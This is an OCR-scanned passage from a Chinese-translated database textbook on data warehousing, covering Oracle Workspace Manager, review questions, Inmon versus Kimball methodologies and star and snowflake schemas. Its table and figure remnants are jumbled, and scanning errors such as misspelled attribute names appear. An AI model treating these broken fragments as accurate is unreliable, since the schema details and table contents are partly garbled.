Workspace Manager 自动 检测 冲突 ， 冲 突 就 是 对 工作 空间 及 其 父 工作 空间 中 同一 行 的 修 
改 导 出 的 数据 值 存在 差异 。 在 将 修改 从 工作 空间 归并 到 父 工作 空间 之 前 ， 必 须 解 决 冲突 。 可 
使 用 工作 空间 锁 来 避免 冲突 。 

保存 点 是 工作 空间 中 的 一 些 点 ， 对 启用 版 本 表 中 行 的 修改 可 以 回 滚 到 这 些 点 ， 用 户 也 可 
以 查看 数据 库 在 这 些 点 上 的 样子 。 保 存 点 通常 是 为 了 响应 与 业务 相关 的 里 程 碑 而 创建 ， 例 如 
设计 阶段 完成 或 结算 期 结束 。 

历史 选项 允许 对 已 启用 版 本 表 的 所 有 行进 行 的 更 改 加 盖 时 间 戳 ， 并 为 所 有 更 改 或 仅 是 每 
行 最 新 一 次 更 改 保存 一 个 副本 。 如 果 对 版 本 启用 表 选 择 保留 所 有 更 改 (指明 “不 覆盖 ”历史 
选项 )， 就 保持 了 对 所 有 行 版 本 所 做 的 所 有 更 改 的 持久 历史 ,使 得 用 户 能 够 转 到 任何 时 间 点 
从 该 工作 空间 的 角度 查看 那 一 刻 的 数据 库 。 

有 效 时 间 段 表 

Workspace Manager 支持 有 效 时 间 ， 也 称 为 有 效 日 期 化 的 版 本 启用 表 。 某 些 应 用 需要 存 
储 数 据 及 一 个 关联 的 时 间 范 围 ， 以 指示 数据 有 效 性 。 也 就 是 说 ， 每 条 记录 只 在 与 记录 相关 
联 的 时 间 范 围 内 有 效 。 当 对 一 个 表 启用 版 本 时 可 启用 有 效 时 间 支 持 。 也 可 以 对 一 个 已 有 的 启 
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用 版 本 表 添 加 有 效 时 间 支 持 。 如 果 启 用 有 效 时 间 支 持 ， 则 每 行 都 包含 一 个 添加 列 ， 用 来 保存 
与 该 行 相关 联 的 有 效 时 间 段 。 可 以 指定 这 个 段 的 有 效 时 间 范 围 ，Workspace Manager 将 确保 
查询 、 插 入 、 更 新 和 删除 操作 正确 地 反映 和 适应 这 个 有 效 时 间 范 围 。 指 定 的 有 效 时 间 范 围 可 
以 是 过 去 或 未 来 ， 或 包括 过 去 、 现 在 和 未 来 。 有 关 Oracle Workspace Manager 的 更 多 详细 信 
息 ， 请 参考 Rugtanom ( 2012 ) 。 


有 关 Oracle 数据 仓库 的 更 多 详细 信息 ， 请 访问 http://www.oracle.com。 


本 章 小 结 


数据 仓库 ( data warehousing) 是 一 个 用 于 管理 决策 支持 过 程 的 、 面 向 主体 的 、 集 成 的 、 时 变 的 、 非 
易 失 的 数据 集合 。 其 目标 是 将 整个 企业 的 数据 集成 到 一 个 单一 的 存储 中 ,在 这 里 用 户 可 以 方便 地 进 
行 查询 、 产 生 报 表 、 进 行 分 析 。 


e 数据 仓库 的 潜在 优势 在 于 高 的 投资 回报 率 、 明 显 的 竞争 优势 、 企 业 决 策 者 的 生产 力 增长 。 


由 于 每 个 系统 都 是 为 满足 不 同 需求 而 设计 ， 用 于 联机 事务 处 理 ( Online Transaction Processing， 
OLTP) 的 数据 库 管理 系统 不 适合 数据 仓库 。 例 如 ,联机 事务 处 理 系统 设计 的 目标 是 使 事务 处 理性 能 
最 好 ， 而 数据 仓库 则 是 用 来 支持 即席 (ad hoc) 查询 处 理 。 

数据 仓库 的 主要 组 成 包括 运营 型 数据 源 、 运 营 型 数据 存储 、ETL 管理 器 、 仓 库 管理 器 、 查 询 管理 器 、 
细节 数据 、 轻 度 和 高 度 汇总 数据 、 存 档 /备份 数据 、 元 数据 和 终端 用 户 访问 工具 。 

数据 仓库 的 运营 型 数据 ( operational data) 源 可 能 是 存储 在 大 型 机 上 第 一 代 层 次 和 网 状 数据 库 中 的 
运营 数据 ， 也 可 能 是 存放 在 私有 文件 系统 中 部 门 的 数据 ， 还 可 能 是 存放 在 工作 站 、 私 有 服务 器 上 的 
私有 数据 ， 以 及 像 Internet、 商 用 数据 库 或 与 企业 的 供应 商 或 顾客 相关 的 数据 库 等 外 部 系统 。 
运营 型 数据 存储 ( Operational Data Store，ODS ) 存储 了 当前 集成 的 用 于 分 析 的 运营 数据 。 它 的 
结构 与 数据 来 源 一 般 与 数据 仓库 相同 ， 但 是 它 只 是 作为 数据 仓库 和 运营 型 数据 库 之 间 的 一 个 中 间 
层次 。 

ETL 管理 器 执行 所 有 与 数据 提取 与 装载 进 仓 库 有 关 的 操作 。 这 些 操作 包括 数据 进入 数据 仓库 前 的 简 
单 变 换 工作 。 

仓库 管理 器 ( warehouse manager) 执行 管理 数据 仓库 相关 的 所 有 操作 ， 包 括 分 析 数 据 一 致 性 、 变 换 
与 合并 源 数 据 、 创 建 索 引 和 视图 、 对 数据 进行 逆 规 范 化 、 产 生 聚 集 数 据 、 备 份 与 存档 数据 。 

查询 管理 器 ( query manager) 执行 与 用 户 查 询 相 关 的 所 有 操作 ， 包 括 将 查询 定向 到 相应 的 表 并 在 查 
询 执行 中 进行 调度 。 

终端 用 户 访问 工具 ( end-user access tool) 被 分 成 四 个 主要 的 类 : 数据 报表 和 查询 工具 、 应 用 程序 开 
发 工具 、 联 机 分 析 处 理 (OLAP) 工具 、 数 据 挖掘 工具 。 

对 数据 仓库 DBMS 的 需求 包括 加 载 性 能 、 加 载 处 理 、 数 据 质 量 管理 、 查 询 性 能 、T 字 节 的 可 扩展 性 、 
用 户 数量 可 扩展 性 、 网 络 化 数据 仓库 、 数 据 仓 库 管 理 、 集 成 的 维度 分 析 、 高 级 的 查询 功能 。 

数据 集 市 ( data mart) 是 数据 仓库 的 一 个 子 集 ， 用 于 支持 某 个 部 门 或 业务 功能 的 需求 。 与 数据 集 市 
相关 的 问题 包括 : 功能 、 大 小 、 加 载 性 能 、 用 户 对 多 个 数据 集 市 中 数据 的 访问 、Internet/ 企业 内 联 
网 访问 、 管 理 和 安装 。 


思考 题 
31.1 当 描述 数据 仓库 的 特性 时 ， 下 面 术语 的 含义 是 什么 ? 


(a) 面向 主体 的 
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(b) 集成 的 

(c) 时 变 的 

(d) 非 易 失 的 

讨论 联机 事务 处 理 (OLTP) 系统 与 数据 仓库 系统 的 不 同 。 

讨论 数据 仓库 技术 的 优势 与 问题 。 

给 出 一 个 数据 仓库 的 典型 体系 结构 和 主要 组 成 部 分 的 图 形 表示 。 
描述 以 下 数据 仓库 组 成 部 分 的 主要 特性 和 功能 : 

(a) ETL 管理 器 

(b) 仓库 管理 器 

(c) 查询 管理 器 

(d) 元 数据 

(e) 终端 用 户 访 问 工具 

描述 与 数据 提取 、 清 洗 和 转换 工具 相关 联 的 过 程 。 

描述 对 用 于 数据 仓库 环境 的 数据 库 管 理 系统 (RDBMS) 的 特殊 需求 。 
讨论 并 行 技术 如 何 支 持 数 据 仓库 的 需求 。 

讨论 管理 元 数据 的 重要 性 ， 以 及 它 与 数据 仓库 的 集成 关系 。 


讨论 管理 和 治理 数据 仓库 的 主要 任务 。 
讨论 数据 集 市 与 数据 仓库 的 不 同 ， 并 指明 实现 一 个 数据 集 市 的 主要 原因 。 
讨论 Oracle 中 支持 数据 仓库 核心 需要 的 那些 主要 特性 。 


在 DreamHome 案例 中 ， 主 管 经 理 请 你 对 整个 企业 的 数据 仓库 的 可 行 性 进行 调查 ， 并 做 出 报告 。 
在 报告 中 必须 比较 数据 仓库 技术 与 OLTP 系统 的 差别 ， 指 明 其 优势 与 劣势 ， 以 及 实现 数据 仓库 中 
可 能 存在 的 任何 问题 。 这 个 报告 必须 在 DreamHome 数据 仓库 的 可 行 性 问题 上 得 出 一 个 合理 的 
结论 。 
本 练习 的 目的 是 给 出 这 样 一 个 场景 ， 要 求 你 扮演 你 所 在 大 学 (或 学 院 ) 的 商务 智能 ( BI) 顾问 
的 角色 ， 写 一 份 报告 ， 指 出 与 商务 智能 相关 的 机 会 和 问题 。 

场景 : 一 所 大 学 (或 学 院 ) 的 高 级 管理 团队 刚刚 完成 了 一 个 五 年 计划 ， 关 于 建设 一 个 全 大 
学 的 计算 系统 ， 用 以 支持 所 有 核心 业务 流程 ， 比 如 学 生 管 理 信息 系统 、 工 资 和 财务 系统 以 及 包 
括 课程 时 间 表 在 内 的 资源 管理 系统 。 伴 随 计算 机 系统 应 用 的 这 种 扩展 ， 将 有 大 量 关 于 大 学 业务 
流程 的 事务 数据 在 不 断 积 累 ， 高 级 管理 层 意识 到 隐藏 在 这 些 数 据 中 的 信息 的 潜在 价值 。 事 实 
上 ， 大 学 的 高 级 管理 层 有 一 个 长 期 的 目标 ， 就 是 为 整个 大 学 的 关键 决策 者 们 提供 BI 工具 ,使 
他 们 在 办 公 桌 上 就 能 监控 关键 性 能 指标 (KPI) 。 然 而 ， 高 级 管理 层 承认 要 实现 这 一 目标 还 有 许 
多 个 里 程 碑 。 考 虑 到 这 一 点 ， 你 的 任务 就 是 ， 协 助 管理 层 确定 建立 必要 的 基础 设施 所 需 技术 以 
及 该 大 学 存在 的 障碍 和 机 遇 ， 以 便 最 终 将 BI 提供 给 关键 决策 者 。 

进行 调查 研究 ， 使 用 本 章 最 初 给 出 的 材料 ， 然 后 补充 这 些 信息 ， 使 用 外 部 资源 ， 例 如 供应 
商 网 站 (例如 ，www.ibm.com，www.microsoft.com，www.oracle.com，www.sap.com) 或 数据 
仓库 /BI 网 站 (例如 ，www.information-management.com, www.tdwi.org, www.dwinfocenter. 
org) 调查 以 下 三 层 数据 仓库 环境 中 的 一 层 (或 全 部 )， 也 就 是 : 源 系统 和 ETL 过 程 、 数 据 仓库 
和 OLAP、 终 端 用户 BI 工具 。 为 高 级 管理 层 编 写 一 份 报告 ， 关 于 每 层 都 给 出 下 列 详细 信息 : 


(a) 目的 和 重要 性 (包括 与 其 他 层 的 关系 )。 

(b) 机 会 和 利益 。 

(c) 相关 技术 。 

(d) 商用 产品 。 

(e) 存在 问题 (problem) 和 要 解决 问题 (issue)。 
(f) 新 趋势 。 
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| 本 章 目 标 
本 章 我 们 主要 学 习 : 
®@ 与 启动 数据 仓库 项 目 相 关 的 活动 。 
@ 把 数据 仓库 开发 融合 为 一 体 的 两 种 主要 方法 学 : Inmon 的 企业 信息 工厂 (CIF) 和 
Kimball 的 业务 维度 生命 周期 。 
与 Kimball 的 业务 维度 生命 周期 相关 的 主要 原则 和 阶段 。 
与 维度 建 模 相关 的 概念 ， 这 是 Kimball 的 业务 维度 生命 周期 的 核心 技术 。 
Kimball 的 业务 维度 生命 周期 的 维度 建 模 阶段 。 
使 用 DreamHome 案例 研究 逐步 创建 维度 模型 (DM )。 
与 数据 仓库 的 开发 相关 的 问题 。 
如 何 使 用 Oracle Warehouse Builder 构建 数据 仓库 。 


在 第 31 章 中 我 们 描述 了 数据 仓库 的 基本 概念 ， 本 章 将 主要 讨论 与 数据 仓库 开发 相关 的 
方法 学 、 活 动 和 问题 。 

32.1 节 一 般 性 地 讨论 如 何 建立 企业 数据 仓库 (EDW) 的 需求 。32.2 节 介 绍 与 开发 一 个 
EDW 相关 联 的 两 种 主要 方法 学 : Inmon 的 企业 信息 工厂 (GIF) (Inmon，2001 ) 和 Kimball 
的 业务 维度 生命 周期 (Kimball，2008 )。32.3 节 概 述 了 Kimball 业务 维度 生命 周期 ， 它 使 用 
一 种 称 为 维度 建 模 的 技术 。32.4 节 描 述 与 维度 建 模 相 关 的 基本 概念 。32.5 节 专 注 于 Kimball 
业务 维度 生命 周期 的 维度 建 模 阶 段 ， 使 用 取 自 DreamHome 案例 研究 ( 见 11.4 节 ) 扩展 版 的 
一 个 工作 案例 ， 演 示 了 如 何 为 数据 集 市 创建 一 个 维度 模型 ， 最 后 用 于 EDW。32.6 节 考 虑 与 
数据 仓库 开发 相关 的 特殊 问题 。 最 后 ，32.7 节 概 述 了 一 个 支持 EDW 开发 的 产品 : Oracle 的 


Warehouse Builder。 


32.1 设计 数据 仓库 数据 库 


设计 一 个 数据 仓库 数据 库 是 一 项 很 复杂 的 工作 。 在 开始 设计 数据 仓库 以 前 ， 首 先 要 回 
答 以 下 一 些 问 题 : 哪 一 项 用 户 需求 最 重要 ? 哪些 数据 应 该 被 优先 考虑 ? 还 有 工程 的 规模 是 否 
应 该 减 小 到 易于 管理 ， 但 同时 能 提供 一 个 基础 ， 最 终 能 够 提交 一 个 全 规模 的 企业 数据 仓库 ? 
这 些 问题 显示 了 构建 数据 仓库 的 一 些 主要 问题 。 对 许多 企业 而 言 ， 解 决 方案 就 是 构建 数据 集 
市 ， 这 在 31.4 节 讨 论 过 。 数 据 集 市 只 要 求 设计 者 构建 一 个 简单 得 多 但 却 能 满足 一 组 特定 用 
户 需要 的 东西 。 没 有 设计 者 愿意 一 次 性 提交 一 个 可 以 满足 所 有 用 户 需 要 的 整个 企业 范围 的 设 
计 。 然 而 ,构建 数据 集 市 只 能 作为 解决 企业 需要 的 中 间 方 案 ， 最 终 目标 仍 是 构建 一 个 支持 整 
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个 企业 需要 的 数据 仓库 。 目 前 ， 更 经 常 的 是 把 数据 仓库 称 为 企业 数据 仓库 (EDW)， 旨 在 强 
调 这 样 一 个 系统 提供 支持 的 范围 。 

EDW 项 目的 需求 收集 和 分 析 阶 段 涉及 与 企业 中 相关 的 成 员 面 谈 ， 例 如 市 场 部 门 的 用 户 、 
金融 部 门 的 用 户 、 销 售 部 门 的 用 户 、 运 营 部 门 的 用 户 和 管理 部 门 ， 以 明确 建立 数据 仓库 所 必 
须 满足 的 一 组 带 优先 级 的 企业 需求 。 与 此 同时 ， 还 要 与 OLTP 系统 的 负责 人 交谈 ， 以 确定 哪 
些 数据 源 可 以 提供 清洁 、 有 效 、 一 致 的 数据 ， 并 且 能 在 以 后 数 年 内 长 期 提供 数据 支持 。 

这 些 面谈 为 EDW 的 自 上 向 下 视图 (用户 需求 ) 和 自 下 向 上 视图 (可 用 数据 源 ) 提供 必要 
的 信息 。 定 义 好 这 两 个 视图 ， 就 可 以 开始 设计 数据 仓库 数据 库 了 。 下 一 节 将 介绍 有 关 EDW 
开发 的 两 种 方法 学 。 


32.2 ”数据 仓库 开发 方法 学 


把 EDW 开发 融合 为 一 体 的 两 种 主要 方法 学 分 别 由 数据 仓库 领域 的 两 个 主要 的 倡导 者 
提出 : Inmon 的 企业 信息 工厂 (Inmon，2001 ) 和 Kimball 的 业务 维度 生命 周期 ( Kimball， 
2008 )。 这 两 种 方法 学 都 是 关于 创建 基础 设施 来 支持 企业 的 所 有 信息 需求 。 然 而 ， 本 节 只 讨 
论 方法 学 中 涉及 企业 数据 仓库 开发 的 部 分 。 

存在 两 种 方法 学 的 原因 是 ， 它 们 朝 着 相同 的 目标 却 采 用 了 不 同 的 路 线 ， 各 适用 于 不 同 的 
情况 。Inmon 的 方法 一 开始 就 创建 关于 所 有 企业 数据 的 数据 模型 ， 一 旦 完成 ， 它 就 用 于 实现 
EDW。EDW 用 于 导出 各 部 门 的 数据 库 〈 数 据 集 市 )， 以 满足 各 部 门 特定 的 信息 要 求 。EDW 
还 可 以 向 其 他 专门 的 决策 支持 应 用 (如 客户 关系 管理 ( CRM) ) 提供 数据 。Inmon 的 方法 学 
使 用 传统 的 数据 库 方 法 和 技术 来 开发 EDW。 例如， 使 用 实体 关系 ( ER) 建 模 (第 12 章 ) 以 
描述 EDW 数据 库 ， 其 保存 具有 第 三 范式 的 表 (第 14 章 )。Inmon 认为 ， 需要 一 个 完全 规范 
的 EDW 才能 提供 必要 的 灵活 性 ， 以 支持 企业 的 各 个 部 门 要 求 的 各 种 各 样 重 肆 和 独特 的 信息 

Kimball 的 方法 学 在 开发 EDW 中 使 用 了 新 的 方法 和 技术 。Kimball 首先 确定 信息 需求 
( 称 为 分 析 主 题 ) 和 企业 相关 的 业务 流程 。 这 个 活动 的 结果 是 创建 了 一 个 称 为 数据 仓库 总 线 
和 矩阵 ( data warehouse bus matrix) 的 关键 文档 。 该 矩阵 列 出 了 企业 的 所 有 关键 业务 流程 以 及 
如 何 分 析 这 些 过 程 的 指示 。 该 矩阵 用 于 方便 地 选择 和 开发 第 一 个 数据 库 (数据 集 市 )， 以 满 
足 企 业 中 一 组 特定 用 户 的 信息 需求 。 这 第 一 个 数据 集 市 对 于 设置 场景 以 便 集成 后 来 上 线 的 其 
他 数据 集 市 至 关 重 要 。 数 据 集 市 的 集成 最 终 推动 EDW 的 开发 完成 。Kimball 使 用 一 种 称 为 
维度 建 模 (dimensionality modeling) 的 新 技术 ， 以 建立 数据 模型 ( 称 为 每 个 数据 集 市 的 维度 
模型 (DM) )。 维 度 建 模 完 成 每 个 数据 集 市 维度 模型 (通常 称 为 星 型 模式 ) 的 创建 ， 它 们 通 
常 是 高 度 非 规范 化 的 。Kimball 认为 ， 采 用 星 形 模式 模拟 决策 支持 数据 是 一 种 更 直观 的 方式 ， 
因此 能 提高 复杂 分 析 查 询 的 性 能 。32.4 节 将 描述 维度 建 模 ，32.5 节 将 用 DreamHome 案例 分 
析 说 明 如 何 使 用 维度 建 模 来 创建 数据 集 市 并 最 终 得 到 企业 数据 仓库 。 

无 论 是 Kimball 的 业务 维度 生命 周期 (Kimball，2008 )， 还 是 Inmon 的 企业 信息 工厂 
( Inmon，2001 )， 两 种 方法 学 都 认为 ， 在 数据 仓库 的 开发 过 程 中 ， 提 供 对 企业 数据 的 一 致 和 
全 面 的 看 法 是 满足 整个 企业 信息 要 求 的 关键 。 然 而 ， 实 现 EDW 的 路 线 有 所 不 同 。 在 不 同 
的 情况 下 ， 两 种 方法 在 开发 企业 数据 仓库 时 存在 优 劣 之 分 。 一 般 来 说 ， 当 关键 问题 是 企业 
(而 不 仅仅 是 某 个 具体 部 门 ) 的 信息 需求 需要 尽快 而 不 是 待 以 后 满足 ， 并 且 该 企业 能 负担 得 
起 一 个 需要 超过 一 年 时 间 才 知道 投资 回报 率 ( ROI) 的 大 项 目 时 ，Inmon 的 方法 可 能 更 受 欢 
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迎 。 反 过 来 ， 当 关键 问题 是 要 在 短 时 间 内 满足 一 个 特定 用 户 组 的 信息 需求 并 且 整 个 企业 的 
信息 需求 可 在 以 后 某 个 时 期 再 满足 时 ，Kimball 方法 成 为 优选 。 使 用 Inmon 的 CIF 方法 学 或 
Kimball 的 业务 维度 生命 周期 方法 学 开发 企业 数据 仓库 的 主要 优 缺 点 见 表 32-1。 


表 32-1 使 用 Inmon 的 CIF 方法 学 和 Kimball 的 业务 维度 生命 周期 方法 学 开发 EDW 的 主要 优 缺 点 


提供 一 致 、 全 面 的 企业 
数据 视图 

缩减 项 目 规模 ， 在 规定 的 | ”由 于 数据 集 市 可 能 由 不 同 开发 团队 使 用 不 同系 统 依次 开发 ， 提 
时 间 段 和 预算 内 完成 任务 “| 供 一 致 和 全 面 的 企业 数据 视图 的 最 终 目标 可 能 永远 不 容易 实现 
正如 前 面 讨 论 的 ， 这 两 种 方法 学 的 关键 不 同 在 于 , Inmon 使 用 传统 的 数据 库 方法 和 技术 ， 


而 Kimball 引入 了 新 的 方法 和 技术 ， 正 因为 如 此 ， 下 面 会 更 详细 考虑 Kimball 的 方法 学 。 下 
节 概 述 Kimball 的 业务 维度 生命 周期 。 


32.3 ”Kimball 的 业务 维度 生命 周期 


与 Kimball 的 业务 维度 生命 周期 相关 联 的 指导 性 原则 是 ， 通 过 建设 一 个 单一 、 集 成 、 易 
于 使 用 、 高 性 能 的 信息 基础 设施 来 满足 企业 的 信息 需求 ， 该 基础 设施 应 在 6 个 月 至 12 个 月 
的 时 间 范 围 内 增 量 式 交付 。 最 终 目标 是 提交 完整 的 解决 方案 ， 包 括 数据 仓库 、 即 席 查询 工 
具 、 报 表 应 用 程序 、 高 级 分 析 以 及 所 有 必要 的 培训 和 用 户 支持 。 

组 成 业务 维度 生命 周期 的 各 阶段 如 图 32-1 所 示 。 业 务 需 求 定义 阶段 扮演 中 心 角 色 ， 它 
既 影 响 项 目 规划 ， 又 是 生命 周期 中 三 条 轨道 的 基础 ， 包 括 技术 (顶部 轨道 )、 数 据 (中 间 轨 
道 ) 和 商务 智能 (BI) 应 用 (底部 轨道 )。 生 命 周 期 另外 的 特性 包括 综合 项 目 管理 和 涉及 数据 
集 市 开发 的 增 量 迭代 方法 ， 数 据 集 市 最 终 都 集成 到 一 个 EDW 中 。 

















Inmon 的 企业 信 
已 焉 广 

Kimball 的 业务 
维度 生命 周期 


大 型 复杂 项 目 可 能 无 法 在 规定 的 时 间 段 和 预算 内 完成 













图 32-1 Kimball 的 业务 维度 生命 周期 的 各 阶段 (Kimball，2008 ) 


在 下 面 几 节 中 ， 我们 首先 考虑 与 维度 建 模 相关 的 概念 ， 然 后 专注 于 Kimball 的 业务 维度 
生命 周期 中 的 维度 建 模 阶段 。 
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32.4 维度 建 模 


| 维度 建 模 | 一 种 远 辑 设计 技术 ， 旨 在 用 标准 、 直 观 的 形式 表示 数据 以 便 得 到 高 效 的 数据 访问 。 


每 个 维度 模型 都 由 一 个 带 有 组 合 主 关键 字 的 表 和 一 系列 较 小 的 表 组 成 。 前 者 称 为 事实 表 
( fact table)， 后 者 称 为 维 表 (dimension table)。 每 一 个 维 表 有 一 个 简单 〈 非 组 合 ) 主 关键 字 ， 
它 确切 对 应 着 事实 表 的 组 合 主 关键 字 中 的 一 项 。 也 就 是 说 ， 事 实 表 的 主 关 键 字 由 两 个 或 多 个 
外 部 关键 字 组 成 。 这 种 “ 星 状 ”结构 被 称 为 星 形 模式 ( star schema) 或 星 形 连接 ( star join ) 。 
DreamHome 房产 销售 的 一 个 星 形 模式 ( 维 模型 ) 的 例子 显示 在 图 32-2 中 。 注 意外 部 关键 字 
(被 标记 为 {FK}) 包含 在 维度 模型 中 。 


维 表 


维 表 PropertyForSale 


propertyNo 


timelD {PK} 
day 

week 
month 


year 


country 


ClientBuyer 


clientID {PK} 
clientNo 
clientName 
clientType 
city 

region 
country 





branchID {PK} 
branchNo 
branchType 
city 

region 
Country 





Staff 


stafflD {PK} 
promotionID {PK} staffNo 
promotionNo staffName 
promotionName position 
promotionType Sex 


city 
region 
country 


ownerlD {PK} 
ownerNo 





ownerName 
ownerType 
city 

region 
counitry 





维 表 
32-2 ”DreamHome 房产 销售 的 星 形 模式 


DM 的 另 一 个 重要 特性 是 所 有 自然 关键 字 都 用 代理 关键 字 代 替 。 这 意味 着 事实 表 与 
维 表 之 间 进 行 的 每 次 连接 都 是 基于 代理 关键 字 而 不 是 基于 自然 关键 字 。 每 个 代理 关键 字 
( surrogate key) 应 该 具有 基于 整数 的 通用 结构 。 采 用 代理 关键 字 的 目的 是 使 数据 仓库 的 数据 
独立 于 OLTP 系统 中 产生 和 使 用 的 数据 。 例 如 ， 每 个 分 公司 有 自然 关键 字 branchNo， 也 有 
代理 关键 字 branchID 。 
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| 星 形 模式 | 一 种 维 数据 模型 ， 其 事实 表 在 中 央 ， 周围 是 非 规范 的 维 表 。 


星 形 模 式 利用 了 事实 数据 的 特性 ， 即 事实 数据 是 由 过 去 发 生 的 事件 产生 的 。 不 管用 什么 
样 的 方法 进行 分 析 ， 这 些 数 据 一 般 不 会 改变 。 由 于 事实 数据 占 数据 仓库 数据 总 量 的 大 多 数 ， 
因此 事实 表 相 对 于 维 表 来 讲 要 大 得 多 。 因 此 ， 把 事实 数据 作为 不 再 变化 的 只 读数 据 是 非常 重 
要 的 。 最 有 用 的 事实 表 应 包含 一 个 或 多 个 数值 量 , 或 称 “事实 ”"， 并 且 在 每 个 记录 中 都 会 出 现 。 
在 图 32-2 中 ,事实 数据 有 offerPrice 、sellingPrice 、saleCommission 和 saleRevenue。 事 实 表 中 最 
有 用 的 事实 是 数值 型 和 可 累加 的 数据 。 因 为 数据 仓库 应 用 几乎 从 不 访问 单个 记录 ， 而 是 同时 
访问 成 百 上 千 甚 至 上 百 万 个 记录 。 而 处 理 如 此 多 记录 的 最 有 用 的 方法 就 是 对 它们 进行 聚集 。 

相 比 之 下 ， 维 表 中 一 般 包含 的 是 一 些 描 述 性 的 文本 信息 。 维 度 属 性 用 作 数 据 仓库 查询 
时 的 约束 。 例 如 ， 图 32-2 中 的 星 形 模式 就 可 以 支持 如 下 查询 : 使 用 PropertyForSale 表 中 的 
city 属性 来 查询 格拉 斯 哥 市 的 房产 销售 情况 ， 使 用 PropertyForSale 表 的 type 属性 来 查询 公 
寓 的 销售 情况 。 事 实 上 ， 数 据 仓 库 的 可 用 性 与 维 表 中 数据 适当 与 否 是 相关 的 。 

星 形 模式 可 以 通过 将 引用 信息 逆 规 范 化 成 一 张 单一 的 维 表 来 加 速 查询 性 能 。 例 如 ,在 
图 32-2 中 ， 几 个 维 表 ( 即 PropertyForSale 、Branch 、ClientBuyer 、Staff、Owner) 中 都 重复 
存放 了 位 置 数据 ( city、region 和 country)。 当 多 个 实体 关联 到 经 常 被 访问 的 维 表 时 ， 为 避 
免 由 于 访问 那些 属性 而 不 得 不 与 维 表 连 接 所 带 来 的 开销 ， 逆 规范 化 是 非常 合适 的 。 但 如 果 这 
些 附 加 数据 不 经 常 使 用 ， 逆 规范 化 就 不 合适 了 ， 因 为 扫描 这 些 扩展 维 表 的 开销 不 见得 抵 得 上 
获得 的 性 能 增益 。 


| 雪花 模式 | 一 种 维 数据 模型 ， 其 事实 表 在 中 央 ， 周 围 是 规范 的 维 表 。 


有 一 种 星 形 模 式 的 变形 ， 称 为 雪花 模式 (snowflake schema)， 这 种 模式 允许 维 中 有 维 。 
例如 ， 可 以 把 图 32-2 中 Branch 维 表 中 的 位 置 数据 ( city 、region 和 country 属性 ) 规范 化 ， 
创建 两 个 新 的 维 表 City 和 Region。Branch 维 表 的 规范 化 版 本 如 图 32-3 所 示 。 在 雪花 模式 中 ， 
PropertyForSale 、ClientBuyer、Staff 和 Owner 维 表 中 的 位 置 数 据 也 可 以 删除 ， 它 们 可 以 共 
享 新 的 City 和 Region 维 表 。 





3 









branchlD {PK} 
branchNo 
branchType 
city {FK} 











city {PK} 
region {FK} 


region {PK} 
country 


图 32-3 DreamHome 房产 销售 星 形 模 式 中 Branch 维 表 部 分 的 规范 化 版 本 
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| 星座 模式 | 一 种 维 数据 模型 ， 其 事实 表 在 中 央 ， 周 围 是 规范 和 非 规范 的 维 表 。 


某 些 维 模式 使 用 了 非 规范 的 星 形 模式 和 规范 的 雪花 模式 的 混合 体 。 这 种 星 形 模式 和 雪花 
模式 的 组 合 模式 称 为 星座 模式 ( starflake schema )。 某 些 维 可 以 同时 使 用 两 种 模式 来 满足 不 
同 的 查询 要 求 。 不 管 是 星 形 模式 、 雪 花 模 式 还 是 星座 模式 ， 预 期 的 标准 维度 模型 应 该 能 在 数 
据 仓库 环境 下 提供 下 列 优势 : 

e 有 效 性 : 基本 数据 库 结 构 的 一 致 ， 使 得 各 种 工具 (如 报表 书写 工具 或 查询 工具 ) 能 更 

有 效 地 访问 数据 。 

e@ 能 处 理 变化 的 需求 : 由 于 所 有 维 在 提供 对 事实 表 的 访问 这 一 点 上 是 等 同 的 ， 所 以 维 
度 模型 能 适应 用 户 需 求 的 变化 。 这 意味 着 这 种 设计 能 更 好 地 支持 即席 用 户 查询 。 

e 可 扩展 性 : 维度 模型 是 可 以 扩展 的 。 例 如 ， 一 个 维度 模型 必须 支持 的 典型 修改 包括 : 
(a) 加 入 新 的 事实 数据 ， 只 要 它 与 现 有 事实 表 的 粒度 一 致 ; (b) 加 入 新 的 维 ， 只 要 新 
加 入 的 维 存在 一 个 单 值 属性 在 现存 事实 表 的 每 一 个 记录 中 有 定义 ;(c) 加 入 新 的 维 属 
性 ; (d) 从 某 指定 时 间 点 开始 把 某 一 维 现存 的 记录 降低 一 级 粒度 。 

e 能 建 模 公共 的 业务 场景 : 已 经 出 现 了 越 来 越 多 的 标准 方法 来 处 理 公共 业务 场景 的 建 
模 。 而 且 ， 对 每 种 场景 都 存在 一 些 约定 俗 成 的 备 选 ， 可 用 以 进行 报表 书写 工具 、 查 
询 工具 或 其 他 用 户 接口 的 编程 。 例 如 ， 像 Branch 或 Staff 这 样 的 “常数 维 ” 缓 慢 且 
异步 地 发 生变 化 ， 我 们 称 其 为 缓慢 变化 维 ，32.5 节 将 详细 讨论 缓慢 变化 维 的 问题 。 

@ 可 预测 的 查询 处 理 : 要 执行 下 钻 ( drill down) 操作 的 数据 仓库 应 用 将 简单 、 不 断 地 

在 单个 维度 模型 内 加 入 更 多 的 维 属性 。 横 钻 (drill across) 的 应 用 可 通过 共享 维 将 分 
离 的 事实 表 链 在 一 起 。 尽 管 整个 企业 的 维度 模式 很 复杂 ， 但 是 查询 处 理 却 是 可 以 预 
测 的 ， 因 为 在 最 底层 ， 每 个 事实 表 都 应 该 被 独立 查询 。 


维度 模型 与 实体 关系 模型 的 比较 


本 节 将 对 比 维度 模型 (DM) 与 实体 关系 (ER) 模型 。 正 如 前 节 所 描述 的 那样 ，DM 通 
常用 于 设计 数据 仓库 中 的 数据 库 部 分 (或 更 常见 的 数据 集 市 )， 而 ER 模型 传统 地 用 于 描述 联 
机 事务 处 理 (OLTP) 系统 的 数据 库 。 

ER 建 模 是 一 种 抽取 实体 间 联 系 的 技术 。ER 建 模 的 主要 目的 是 移 去 数据 间 的 完 余 。 这 
对 事务 处 理 来 说 是 极为 有 效 的 ， 因 为 事务 将 变 得 十 分 简单 与 确定 。 例 如 ， 一 个 要 更 新 客户 地 
址 的 事务 一 般 只 需 访 问 Client 表 中 的 单个 记录 ， 而 且 如 果 使 用 了 建立 在 主键 clientNo 上 的 索 
引 ， 那 么 访问 的 速度 还 会 更 快 。 然 而 ， 这 种 数据 库 虽 使 事务 处 理 非常 高 效 ， 但 却 不 能 有 效 、 
方便 地 支持 终端 用 户 的 即席 查询 。 一 些 传统 业务 应 用 如 客户 订单 、 股 票 控 制 和 顾客 计价 需要 
执行 许多 表 之 间 的 连接 操作 。 一 个 企业 的 ER 模型 可 能 有 几 百 个 逻辑 实体 ， 相 应 地 映射 到 几 
